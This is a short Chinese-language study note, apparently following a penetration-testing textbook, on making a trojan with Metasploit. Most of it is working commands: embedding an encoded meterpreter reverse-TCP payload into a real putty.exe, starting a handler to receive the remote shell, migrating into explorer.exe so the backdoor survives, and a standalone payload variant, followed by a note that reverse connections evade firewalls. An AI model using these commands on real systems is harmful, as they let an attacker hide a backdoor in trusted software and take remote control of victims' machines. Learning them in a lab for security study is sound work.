metasploit制作木马程序

  第七章第三小节，讲的是将木马绑定到putty.exe程序下。觉得蛮有趣，这里再重复下书上的步骤：

  1）百度搜索，下载原版putty程序

  2）在bt5下输入命令：msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5。这样就生成了一个名为putty_backdoor.exe的木马程序。

  3）启动监听程序：msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 E

  4）将木马程序复制到靶机上运行，这时攻击机上就是获得一个远程连接的meterpreter会话。

  5）将木马线程迁移到进程explorer.exe上，命令为run migrate -n explorer.exe（或者是migrate <对应pid>）。

  6）这样，即使用户关闭了这个木马程序，也不会断开后门的连接。

  以下是我从网上搜索得到的步骤：

1)msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=80 X > Desktop/muma01.exe

（这个是将攻击代码包装成程序，上面2)的是将木马附在正常的程序上）

2)msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.128

msf exploit(handler) > set LPORT 80

msf exploit(handler) > exploit 

（进入metasploit启动监听，上面3)的更为简便是因为节省了启动metasploit的时间）

  另外还有选择bind_tcp作为攻击载荷的，步骤大致一样。

PS：reverse_tcp和bind_tcp这两者的执行过程可以大致理解为以下内容（转自csdn用户u014749470）：

[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim

after the payload is executed
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim

after execution
attacker <-> [port 4444] <-> victim


reverse_tcp：攻击机设置一个端口（LPORT）和IP（LHOST），Payload在测试机执行连接攻击机IP的端口，这时如果在攻击机监听该端口会发现测试机已经连接。
bind_tcp：攻击机设置一个端口（LPORT），Payload在测试机执行打开该端口，以便攻击机可以接入。

采用reverse的方法一般较为安全，因为是在测试机连接攻击机，所以一般不会被防火墙发现；而bind在测试机打开端口时很容易被安全软件和防火墙发现。